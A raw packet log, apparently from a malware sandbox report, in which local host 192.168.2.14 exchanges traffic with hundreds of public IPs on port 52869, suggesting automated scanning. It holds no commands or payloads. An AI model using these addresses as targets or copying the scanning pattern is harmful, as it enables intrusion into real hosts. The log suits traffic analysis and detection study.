                                                Jul 20, 2024 23:05:31.983920097 CEST2696652869192.168.2.14115.97.137.57
                                                Jul 20, 2024 23:05:31.983920097 CEST2696652869192.168.2.1439.176.203.73
                                                Jul 20, 2024 23:05:31.983920097 CEST2696652869192.168.2.1498.139.133.85
                                                Jul 20, 2024 23:05:31.983942032 CEST528692696657.131.227.3192.168.2.14
                                                Jul 20, 2024 23:05:31.983947992 CEST528692696664.104.54.14192.168.2.14
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.14162.47.82.104
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.1434.247.156.202
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.1478.129.211.10
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.14112.153.191.145
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.14106.240.191.91
                                                Jul 20, 2024 23:05:31.983948946 CEST2696652869192.168.2.14216.11.155.229
                                                Jul 20, 2024 23:05:31.983949900 CEST2696652869192.168.2.14212.202.97.136
                                                Jul 20, 2024 23:05:31.983952999 CEST528692696662.5.163.114192.168.2.14
                                                Jul 20, 2024 23:05:31.983963013 CEST5286926966157.104.97.161192.168.2.14
                                                Jul 20, 2024 23:05:31.983968019 CEST5286926966190.231.104.96192.168.2.14
                                                Jul 20, 2024 23:05:31.983972073 CEST5286926966103.132.88.33192.168.2.14
                                                Jul 20, 2024 23:05:31.983977079 CEST5286926966204.66.149.99192.168.2.14
                                                Jul 20, 2024 23:05:31.983983040 CEST5286926966154.57.81.200192.168.2.14
                                                Jul 20, 2024 23:05:31.983988047 CEST5286926966137.134.252.4192.168.2.14
                                                Jul 20, 2024 23:05:31.984040976 CEST5286926966162.190.144.241192.168.2.14
                                                Jul 20, 2024 23:05:31.984045982 CEST5286926966121.248.9.74192.168.2.14
                                                Jul 20, 2024 23:05:31.984051943 CEST5286926966148.30.198.131192.168.2.14
                                                Jul 20, 2024 23:05:31.984055996 CEST528692696675.120.116.239192.168.2.14
                                                Jul 20, 2024 23:05:31.984060049 CEST528692696696.209.69.20192.168.2.14
                                                Jul 20, 2024 23:05:31.984064102 CEST528692696651.192.83.103192.168.2.14
                                                Jul 20, 2024 23:05:31.984069109 CEST5286926966101.86.111.6192.168.2.14
                                                Jul 20, 2024 23:05:31.984072924 CEST5286926966189.230.165.186192.168.2.14
                                                Jul 20, 2024 23:05:31.984077930 CEST528692696641.109.181.54192.168.2.14
                                                Jul 20, 2024 23:05:31.984082937 CEST528692696640.31.56.204192.168.2.14
                                                Jul 20, 2024 23:05:31.984086990 CEST5286926966153.104.11.80192.168.2.14
                                                Jul 20, 2024 23:05:31.984091997 CEST52869269664.162.121.105192.168.2.14
                                                Jul 20, 2024 23:05:31.984096050 CEST528692696681.143.140.223192.168.2.14
                                                Jul 20, 2024 23:05:31.984101057 CEST5286926966210.29.223.179192.168.2.14
                                                Jul 20, 2024 23:05:31.984105110 CEST528692696659.10.142.189192.168.2.14
                                                Jul 20, 2024 23:05:31.984108925 CEST528692696698.74.12.225192.168.2.14
                                                Jul 20, 2024 23:05:31.984112978 CEST528692696619.97.179.204192.168.2.14
                                                Jul 20, 2024 23:05:31.984117031 CEST5286926966117.129.252.99192.168.2.14
                                                Jul 20, 2024 23:05:31.984121084 CEST5286926966134.214.175.73192.168.2.14
                                                Jul 20, 2024 23:05:31.984126091 CEST5286926966200.98.155.108192.168.2.14
                                                Jul 20, 2024 23:05:31.984316111 CEST5286926966192.216.183.201192.168.2.14
                                                Jul 20, 2024 23:05:31.984321117 CEST5286926966184.126.92.19192.168.2.14
                                                Jul 20, 2024 23:05:31.984324932 CEST528692696683.71.51.102192.168.2.14
                                                Jul 20, 2024 23:05:31.984334946 CEST528692696690.248.254.246192.168.2.14
                                                Jul 20, 2024 23:05:31.984339952 CEST5286926966175.80.113.227192.168.2.14
                                                Jul 20, 2024 23:05:31.984344006 CEST528692696689.113.83.91192.168.2.14
                                                Jul 20, 2024 23:05:31.984348059 CEST528692696652.248.88.164192.168.2.14
                                                Jul 20, 2024 23:05:31.984357119 CEST5286926966211.173.154.125192.168.2.14
                                                Jul 20, 2024 23:05:31.984361887 CEST528692696645.129.181.164192.168.2.14
                                                Jul 20, 2024 23:05:31.984365940 CEST5286926966193.109.205.113192.168.2.14
                                                Jul 20, 2024 23:05:31.984441996 CEST528692696636.216.251.126192.168.2.14
                                                Jul 20, 2024 23:05:31.984468937 CEST528692696619.45.76.169192.168.2.14
                                                Jul 20, 2024 23:05:31.984472990 CEST5286926966142.219.250.29192.168.2.14
                                                Jul 20, 2024 23:05:31.984493017 CEST528692696681.167.63.48192.168.2.14
                                                Jul 20, 2024 23:05:31.984499931 CEST528692696695.188.72.113192.168.2.14
                                                Jul 20, 2024 23:05:31.984503984 CEST5286926966131.84.155.33192.168.2.14
                                                Jul 20, 2024 23:05:31.984508991 CEST528692696614.214.68.156192.168.2.14
                                                Jul 20, 2024 23:05:31.984513044 CEST528692696636.164.151.170192.168.2.14
                                                Jul 20, 2024 23:05:31.984518051 CEST5286926966203.171.109.95192.168.2.14
                                                Jul 20, 2024 23:05:31.984523058 CEST5286926966125.97.107.120192.168.2.14
                                                Jul 20, 2024 23:05:31.984527111 CEST5286926966216.17.47.144192.168.2.14
                                                Jul 20, 2024 23:05:31.984532118 CEST5286926966150.186.198.246192.168.2.14
                                                Jul 20, 2024 23:05:31.984536886 CEST5286926966187.140.68.61192.168.2.14
                                                Jul 20, 2024 23:05:31.984540939 CEST5286926966153.126.184.30192.168.2.14
                                                Jul 20, 2024 23:05:31.984545946 CEST528692696651.55.196.22192.168.2.14
                                                Jul 20, 2024 23:05:31.984554052 CEST5286926966107.226.165.86192.168.2.14
                                                Jul 20, 2024 23:05:31.984563112 CEST5286926966175.91.47.151192.168.2.14
                                                Jul 20, 2024 23:05:31.984568119 CEST52869269665.221.237.47192.168.2.14
                                                Jul 20, 2024 23:05:31.984571934 CEST5286926966134.226.59.80192.168.2.14
                                                Jul 20, 2024 23:05:31.984575987 CEST5286926966205.9.202.98192.168.2.14
                                                Jul 20, 2024 23:05:31.984713078 CEST5286926966173.175.30.8192.168.2.14
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1450.167.84.34
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1412.94.49.225
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.14200.238.182.46
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1417.150.249.106
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1452.192.238.227
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1423.55.138.59
                                                Jul 20, 2024 23:05:31.984829903 CEST5286926966138.71.112.70192.168.2.14
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.14211.88.161.89
                                                Jul 20, 2024 23:05:31.984827042 CEST2696652869192.168.2.1437.213.85.230
                                                Jul 20, 2024 23:05:31.984836102 CEST5286926966116.132.89.76192.168.2.14
                                                Jul 20, 2024 23:05:31.984839916 CEST5286926966181.62.64.51192.168.2.14
                                                Jul 20, 2024 23:05:31.984849930 CEST5286926966183.106.204.162192.168.2.14
                                                Jul 20, 2024 23:05:31.984854937 CEST5286926966120.181.185.117192.168.2.14
                                                Jul 20, 2024 23:05:31.984858990 CEST5286926966183.59.191.208192.168.2.14
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.14100.147.99.239
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.1425.145.229.184
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.14185.59.206.117
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.1480.164.32.127
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.14197.23.60.58
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.14207.229.195.229
                                                Jul 20, 2024 23:05:31.984858990 CEST2696652869192.168.2.14164.159.1.86
                                                Jul 20, 2024 23:05:31.984859943 CEST2696652869192.168.2.1487.111.119.131
                                                Jul 20, 2024 23:05:31.984868050 CEST528692696651.84.22.246192.168.2.14
                                                Jul 20, 2024 23:05:31.984873056 CEST5286926966188.199.48.64192.168.2.14
                                                Jul 20, 2024 23:05:31.984877110 CEST528692696620.226.134.71192.168.2.14
                                                Jul 20, 2024 23:05:31.984880924 CEST5286926966149.79.37.237192.168.2.14
                                                Jul 20, 2024 23:05:31.984884977 CEST528692696664.61.239.79192.168.2.14
                                                Jul 20, 2024 23:05:31.984889984 CEST5286926966154.64.178.0192.168.2.14
                                                Jul 20, 2024 23:05:31.984894037 CEST528692696659.35.79.156192.168.2.14
                                                Jul 20, 2024 23:05:31.984898090 CEST5286926966141.0.4.62192.168.2.14
                                                Jul 20, 2024 23:05:31.984901905 CEST5286926966205.35.169.26192.168.2.14
                                                Jul 20, 2024 23:05:31.984905958 CEST528692696624.245.120.74192.168.2.14
                                                Jul 20, 2024 23:05:31.984910011 CEST5286926966223.12.218.46192.168.2.14
                                                Jul 20, 2024 23:05:31.984927893 CEST5286926966105.87.255.111192.168.2.14
                                                Jul 20, 2024 23:05:31.984931946 CEST5286926966135.221.59.240192.168.2.14
                                                Jul 20, 2024 23:05:31.984939098 CEST5286926966119.225.48.58192.168.2.14
                                                Jul 20, 2024 23:05:31.984950066 CEST5286926966130.207.23.122192.168.2.14
                                                Jul 20, 2024 23:05:31.984954119 CEST5286926966191.30.146.121192.168.2.14
                                                Jul 20, 2024 23:05:31.984972954 CEST5286926966119.83.111.97192.168.2.14
                                                Jul 20, 2024 23:05:31.984977961 CEST528692696660.73.199.117192.168.2.14
                                                Jul 20, 2024 23:05:31.984982967 CEST528692696634.90.248.232192.168.2.14
                                                Jul 20, 2024 23:05:31.984987020 CEST5286926966129.37.83.27192.168.2.14
                                                Jul 20, 2024 23:05:31.984993935 CEST5286926966132.232.1.40192.168.2.14
                                                Jul 20, 2024 23:05:31.985004902 CEST528692696649.40.97.50192.168.2.14
                                                Jul 20, 2024 23:05:31.985009909 CEST5286926966210.141.252.193192.168.2.14
                                                Jul 20, 2024 23:05:31.985013008 CEST5286926966200.51.205.131192.168.2.14
                                                Jul 20, 2024 23:05:31.985023975 CEST5286926966145.82.197.86192.168.2.14
                                                Jul 20, 2024 23:05:31.985028982 CEST528692696670.127.37.49192.168.2.14
                                                Jul 20, 2024 23:05:31.985033035 CEST5286926966185.138.94.75192.168.2.14
                                                Jul 20, 2024 23:05:31.985043049 CEST528692696672.58.64.100192.168.2.14
                                                Jul 20, 2024 23:05:31.985048056 CEST528692696639.204.207.21192.168.2.14
                                                Jul 20, 2024 23:05:31.985189915 CEST528692696680.130.32.22192.168.2.14
                                                Jul 20, 2024 23:05:31.985194921 CEST528692696651.156.162.59192.168.2.14
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.14172.51.35.214
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.141.146.229.84
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.1468.40.200.159
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.14218.210.113.18
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.1481.159.195.234
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.14115.150.189.67
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.14153.89.222.39
                                                Jul 20, 2024 23:05:31.985197067 CEST2696652869192.168.2.14144.67.31.243
                                                Jul 20, 2024 23:05:31.985199928 CEST5286926966178.154.163.217192.168.2.14
                                                Jul 20, 2024 23:05:31.985214949 CEST5286926966156.87.172.3192.168.2.14
                                                Jul 20, 2024 23:05:31.985219002 CEST528692696662.135.228.95192.168.2.14
                                                Jul 20, 2024 23:05:31.985223055 CEST5286926966137.29.148.187192.168.2.14
                                                Jul 20, 2024 23:05:31.985233068 CEST5286926966207.28.189.232192.168.2.14
                                                Jul 20, 2024 23:05:31.985238075 CEST5286926966153.91.158.250192.168.2.14
                                                Jul 20, 2024 23:05:31.985243082 CEST5286926966148.195.201.170192.168.2.14
                                                Jul 20, 2024 23:05:31.985248089 CEST528692696668.85.217.10192.168.2.14
                                                Jul 20, 2024 23:05:31.985322952 CEST528692696627.129.79.40192.168.2.14
                                                Jul 20, 2024 23:05:31.985327959 CEST5286926966199.202.13.130192.168.2.14
                                                Jul 20, 2024 23:05:31.985332966 CEST5286926966147.14.244.79192.168.2.14
                                                Jul 20, 2024 23:05:31.985366106 CEST5286926966111.192.150.203192.168.2.14
                                                Jul 20, 2024 23:05:31.985369921 CEST528692696627.21.93.45192.168.2.14
                                                Jul 20, 2024 23:05:31.985373974 CEST5286926966132.253.188.42192.168.2.14
                                                Jul 20, 2024 23:05:31.985482931 CEST528692696627.205.21.176192.168.2.14
                                                Jul 20, 2024 23:05:31.985487938 CEST528692696643.124.228.32192.168.2.14
                                                Jul 20, 2024 23:05:31.985492945 CEST5286926966131.209.58.23192.168.2.14
                                                Jul 20, 2024 23:05:31.985538960 CEST528692696670.251.155.61192.168.2.14
                                                Jul 20, 2024 23:05:31.985557079 CEST5286926966113.211.98.23192.168.2.14
                                                Jul 20, 2024 23:05:31.985713959 CEST2696652869192.168.2.1452.222.226.79
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.1473.26.201.192
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.14117.42.73.64
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.14166.57.172.211
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.1462.123.105.222
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.14133.212.46.75
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.14219.191.82.150
                                                Jul 20, 2024 23:05:31.985714912 CEST2696652869192.168.2.1419.70.24.112
                                                Jul 20, 2024 23:05:31.985820055 CEST5286926966218.175.31.238192.168.2.14
                                                Jul 20, 2024 23:05:31.985825062 CEST528692696617.184.234.0192.168.2.14
                                                Jul 20, 2024 23:05:31.985830069 CEST5286926966131.178.64.107192.168.2.14
                                                Jul 20, 2024 23:05:31.985840082 CEST528692696693.244.188.64192.168.2.14
                                                Jul 20, 2024 23:05:31.985843897 CEST5286926966179.192.77.243192.168.2.14
                                                Jul 20, 2024 23:05:31.985847950 CEST5286926966143.50.74.208192.168.2.14
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.14219.45.60.7
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.1446.187.173.179
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.1466.113.138.125
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.14183.150.0.25
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.1463.215.125.146
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.14204.46.41.237
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.14167.95.218.219
                                                Jul 20, 2024 23:05:31.985853910 CEST2696652869192.168.2.14185.61.35.183
                                                Jul 20, 2024 23:05:31.985857964 CEST528692696614.90.249.72192.168.2.14
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.1436.31.128.72
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.1498.220.90.229
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14136.134.137.226
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14116.18.86.111
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14187.175.255.52
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14126.220.63.76
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14153.115.93.223
                                                Jul 20, 2024 23:05:31.985929966 CEST2696652869192.168.2.14179.12.201.79
                                                Jul 20, 2024 23:05:31.985938072 CEST5286926966212.239.177.163192.168.2.14
                                                Jul 20, 2024 23:05:31.985943079 CEST5286926966123.111.19.233192.168.2.14
                                                Jul 20, 2024 23:05:31.985948086 CEST528692696641.32.9.125192.168.2.14
                                                Jul 20, 2024 23:05:31.985986948 CEST5286926966195.182.30.127192.168.2.14
                                                Jul 20, 2024 23:05:31.985991001 CEST5286926966217.161.186.84192.168.2.14
                                                Jul 20, 2024 23:05:31.985996008 CEST5286926966198.22.21.63192.168.2.14
                                                Jul 20, 2024 23:05:31.986006021 CEST528692696637.150.102.99192.168.2.14
                                                Jul 20, 2024 23:05:31.986128092 CEST5286926966124.61.165.111192.168.2.14
                                                Jul 20, 2024 23:05:31.986133099 CEST528692696631.182.192.107192.168.2.14
                                                Jul 20, 2024 23:05:31.986136913 CEST528692696614.148.186.244192.168.2.14
                                                Jul 20, 2024 23:05:31.986148119 CEST528692696668.10.183.207192.168.2.14
                                                Jul 20, 2024 23:05:31.986277103 CEST5286926966135.6.251.247192.168.2.14
                                                Jul 20, 2024 23:05:31.986282110 CEST52869269661.23.28.195192.168.2.14
                                                Jul 20, 2024 23:05:31.986285925 CEST528692696643.119.39.158192.168.2.14
                                                Jul 20, 2024 23:05:31.986295938 CEST528692696659.242.125.217192.168.2.14
                                                Jul 20, 2024 23:05:31.986300945 CEST5286926966103.77.206.92192.168.2.14
                                                Jul 20, 2024 23:05:31.986304998 CEST5286926966205.8.145.6192.168.2.14
                                                Jul 20, 2024 23:05:31.986314058 CEST5286926966220.224.214.129192.168.2.14
                                                Jul 20, 2024 23:05:31.986320019 CEST528692696647.85.1.133192.168.2.14
                                                Jul 20, 2024 23:05:31.986324072 CEST5286926966132.39.168.140192.168.2.14
                                                Jul 20, 2024 23:05:31.986329079 CEST5286926966193.85.31.138192.168.2.14
                                                Jul 20, 2024 23:05:31.986332893 CEST5286926966106.140.193.219192.168.2.14
                                                Jul 20, 2024 23:05:31.986392975 CEST528692696693.120.173.5192.168.2.14
                                                Jul 20, 2024 23:05:31.986397982 CEST5286926966155.49.251.8192.168.2.14
                                                Jul 20, 2024 23:05:31.986402035 CEST5286926966196.32.183.241192.168.2.14
                                                Jul 20, 2024 23:05:31.986411095 CEST5286926966198.163.171.175192.168.2.14
                                                Jul 20, 2024 23:05:31.986416101 CEST5286926966223.250.141.64192.168.2.14
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.14117.42.61.40
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.1492.110.185.44
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.14190.114.151.234
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.14213.75.251.19
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.1479.137.108.6
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.14120.205.54.36
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.14112.198.90.59
                                                Jul 20, 2024 23:05:31.986529112 CEST2696652869192.168.2.1464.229.118.224
                                                Jul 20, 2024 23:05:31.986604929 CEST5286926966173.89.193.209192.168.2.14
                                                Jul 20, 2024 23:05:31.986609936 CEST5286926966143.165.147.195192.168.2.14
                                                Jul 20, 2024 23:05:31.986614943 CEST5286926966163.170.37.61192.168.2.14
                                                Jul 20, 2024 23:05:31.986624002 CEST5286926966125.249.246.55192.168.2.14
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.142.202.170.175
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.14162.255.189.235
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.14133.80.114.131
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.14138.188.233.114
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.1469.240.181.94
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.1485.82.40.120
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.1485.173.117.190
                                                Jul 20, 2024 23:05:31.986803055 CEST2696652869192.168.2.1491.206.91.62
                                                Jul 20, 2024 23:05:31.986820936 CEST5286926966111.8.128.237192.168.2.14
                                                Jul 20, 2024 23:05:31.986881018 CEST5286926966182.202.245.171192.168.2.14
                                                Jul 20, 2024 23:05:31.986885071 CEST5286926966212.160.183.244192.168.2.14
                                                Jul 20, 2024 23:05:31.986921072 CEST5286926966158.68.165.132192.168.2.14
                                                Jul 20, 2024 23:05:31.986924887 CEST5286926966162.12.166.249192.168.2.14
                                                Jul 20, 2024 23:05:31.986928940 CEST528692696665.108.13.201192.168.2.14
                                                Jul 20, 2024 23:05:31.987000942 CEST52869269669.71.131.31192.168.2.14
                                                Jul 20, 2024 23:05:31.987042904 CEST5286926966114.179.104.124192.168.2.14
                                                Jul 20, 2024 23:05:31.987046957 CEST5286926966206.53.82.225192.168.2.14
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14161.29.255.146
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14201.205.244.63
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14104.252.153.132
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.1480.70.162.243
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14185.193.162.177
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14102.126.174.49
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.1466.24.201.56
                                                Jul 20, 2024 23:05:31.987059116 CEST2696652869192.168.2.14171.139.100.38
                                                Jul 20, 2024 23:05:31.987107992 CEST528692696617.189.220.248192.168.2.14
                                                Jul 20, 2024 23:05:31.987112999 CEST528692696658.236.61.29192.168.2.14
                                                Jul 20, 2024 23:05:31.987123966 CEST5286926966180.106.180.212192.168.2.14
                                                Jul 20, 2024 23:05:31.987133980 CEST528692696673.174.204.179192.168.2.14
                                                Jul 20, 2024 23:05:31.987138033 CEST528692696638.130.134.142192.168.2.14
                                                Jul 20, 2024 23:05:31.987143040 CEST52869269662.163.63.233192.168.2.14
                                                Jul 20, 2024 23:05:31.987147093 CEST5286926966199.117.44.204192.168.2.14
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.14117.34.176.252
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.144.231.153.224
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.14102.188.226.205
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.1480.59.225.141
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.14104.9.38.228
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.14218.251.210.117
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.1418.179.192.140
                                                Jul 20, 2024 23:05:31.987210035 CEST2696652869192.168.2.14126.252.62.133
                                                Jul 20, 2024 23:05:31.987222910 CEST528692696635.159.139.53192.168.2.14
                                                Jul 20, 2024 23:05:31.987227917 CEST5286926966157.63.164.204192.168.2.14
                                                Jul 20, 2024 23:05:31.987231970 CEST528692696691.85.138.225192.168.2.14
                                                Jul 20, 2024 23:05:31.987298012 CEST528692696649.132.116.240192.168.2.14
                                                Jul 20, 2024 23:05:31.987303019 CEST5286926966202.183.171.29192.168.2.14
                                                Jul 20, 2024 23:05:31.987307072 CEST5286926966146.54.174.109192.168.2.14
                                                Jul 20, 2024 23:05:31.987391949 CEST528692696665.119.53.40192.168.2.14
                                                Jul 20, 2024 23:05:31.987485886 CEST5286926966109.170.180.65192.168.2.14
                                                Jul 20, 2024 23:05:31.987499952 CEST5286926966168.99.192.8192.168.2.14
                                                Jul 20, 2024 23:05:31.987504959 CEST5286926966141.117.5.138192.168.2.14
                                                Jul 20, 2024 23:05:31.987519026 CEST52869269661.211.28.20192.168.2.14
                                                Jul 20, 2024 23:05:31.987524033 CEST528692696648.191.112.200192.168.2.14
                                                Jul 20, 2024 23:05:31.987528086 CEST5286926966183.119.35.244192.168.2.14
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14178.79.223.204
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14207.65.159.147
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14210.93.144.172
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.1432.125.121.51
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14157.121.184.60
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14134.152.143.171
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.14108.167.125.26
                                                Jul 20, 2024 23:05:31.988132954 CEST2696652869192.168.2.1454.135.221.53
                                                Jul 20, 2024 23:05:31.988157034 CEST5286926966145.195.83.181192.168.2.14
                                                Jul 20, 2024 23:05:31.988162041 CEST5286926966114.248.35.135192.168.2.14
                                                Jul 20, 2024 23:05:31.988168001 CEST5286926966114.225.14.65192.168.2.14
                                                Jul 20, 2024 23:05:31.988192081 CEST5286926966116.137.1.46192.168.2.14
                                                Jul 20, 2024 23:05:31.988197088 CEST5286926966103.14.70.39192.168.2.14
                                                Jul 20, 2024 23:05:31.988200903 CEST5286926966190.147.108.124192.168.2.14
                                                Jul 20, 2024 23:05:31.988205910 CEST528692696638.30.142.71192.168.2.14
                                                Jul 20, 2024 23:05:31.988210917 CEST5286926966102.124.228.209192.168.2.14
                                                Jul 20, 2024 23:05:31.988255978 CEST2696652869192.168.2.14168.88.234.28
                                                Jul 20, 2024 23:05:31.988255978 CEST2696652869192.168.2.14111.122.87.190
                                                Jul 20, 2024 23:05:31.988255978 CEST2696652869192.168.2.1490.3.162.18
                                                Jul 20, 2024 23:05:31.988256931 CEST2696652869192.168.2.14154.56.85.161
                                                Jul 20, 2024 23:05:31.988256931 CEST2696652869192.168.2.1427.121.250.129
                                                Jul 20, 2024 23:05:31.988256931 CEST2696652869192.168.2.14210.46.147.71
                                                Jul 20, 2024 23:05:31.988256931 CEST2696652869192.168.2.1472.231.32.39
                                                Jul 20, 2024 23:05:31.988256931 CEST2696652869192.168.2.1460.28.5.25
                                                Jul 20, 2024 23:05:31.988414049 CEST528692696631.136.109.228192.168.2.14
                                                Jul 20, 2024 23:05:31.988419056 CEST528692696691.48.213.35192.168.2.14
                                                Jul 20, 2024 23:05:31.988423109 CEST5286926966208.117.82.120192.168.2.14
                                                Jul 20, 2024 23:05:31.988431931 CEST5286926966162.96.80.170192.168.2.14
                                                Jul 20, 2024 23:05:31.988436937 CEST5286926966141.231.43.221192.168.2.14
                                                Jul 20, 2024 23:05:31.988781929 CEST2696652869192.168.2.14217.96.236.61
                                                Jul 20, 2024 23:05:31.988781929 CEST2696652869192.168.2.1486.142.194.221
                                                Jul 20, 2024 23:05:31.988781929 CEST2696652869192.168.2.1465.246.44.29
                                                Jul 20, 2024 23:05:31.988781929 CEST267108081192.168.2.14216.35.193.176
                                                Jul 20, 2024 23:05:31.988781929 CEST267108081192.168.2.14219.10.127.45
                                                Jul 20, 2024 23:05:31.988781929 CEST2696652869192.168.2.14212.45.243.123
                                                Jul 20, 2024 23:05:31.988805056 CEST528692696659.165.217.161192.168.2.14
                                                Jul 20, 2024 23:05:31.988810062 CEST528692696657.144.122.58192.168.2.14
                                                Jul 20, 2024 23:05:31.988812923 CEST528692696678.147.130.95192.168.2.14
                                                Jul 20, 2024 23:05:31.988858938 CEST5286926966175.166.165.48192.168.2.14
                                                Jul 20, 2024 23:05:31.988863945 CEST528692696631.247.190.180192.168.2.14
                                                Jul 20, 2024 23:05:31.988868952 CEST5286926966134.42.80.231192.168.2.14
                                                Jul 20, 2024 23:05:31.988878012 CEST5286926966168.85.33.243192.168.2.14
                                                Jul 20, 2024 23:05:31.988883018 CEST5286926966172.126.0.115192.168.2.14
                                                Jul 20, 2024 23:05:31.988887072 CEST5286926966177.160.195.13192.168.2.14
                                                Jul 20, 2024 23:05:31.988890886 CEST528692696659.135.63.153192.168.2.14
                                                Jul 20, 2024 23:05:31.988899946 CEST528692696677.237.114.164192.168.2.14
                                                Jul 20, 2024 23:05:31.988904953 CEST528692696620.40.190.208192.168.2.14
                                                Jul 20, 2024 23:05:31.988941908 CEST5286926966179.21.144.79192.168.2.14
                                                Jul 20, 2024 23:05:31.988950014 CEST5286926966170.98.124.78192.168.2.14
                                                Jul 20, 2024 23:05:31.988960028 CEST528692696646.103.116.159192.168.2.14
                                                Jul 20, 2024 23:05:31.988970041 CEST5286926966162.47.82.104192.168.2.14
                                                Jul 20, 2024 23:05:31.988974094 CEST528692696637.154.117.198192.168.2.14
                                                Jul 20, 2024 23:05:31.988977909 CEST528692696634.247.156.202192.168.2.14
                                                Jul 20, 2024 23:05:31.989063025 CEST5286926966223.210.25.241192.168.2.14
                                                Jul 20, 2024 23:05:31.989068031 CEST528692696641.152.208.190192.168.2.14
                                                Jul 20, 2024 23:05:31.989072084 CEST5286926966136.195.130.35192.168.2.14
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.14120.108.60.158
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.14105.164.56.144
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.14216.62.74.39
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.145.27.107.135
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.14123.248.134.54
                                                Jul 20, 2024 23:05:31.989080906 CEST2696652869192.168.2.14198.193.14.195
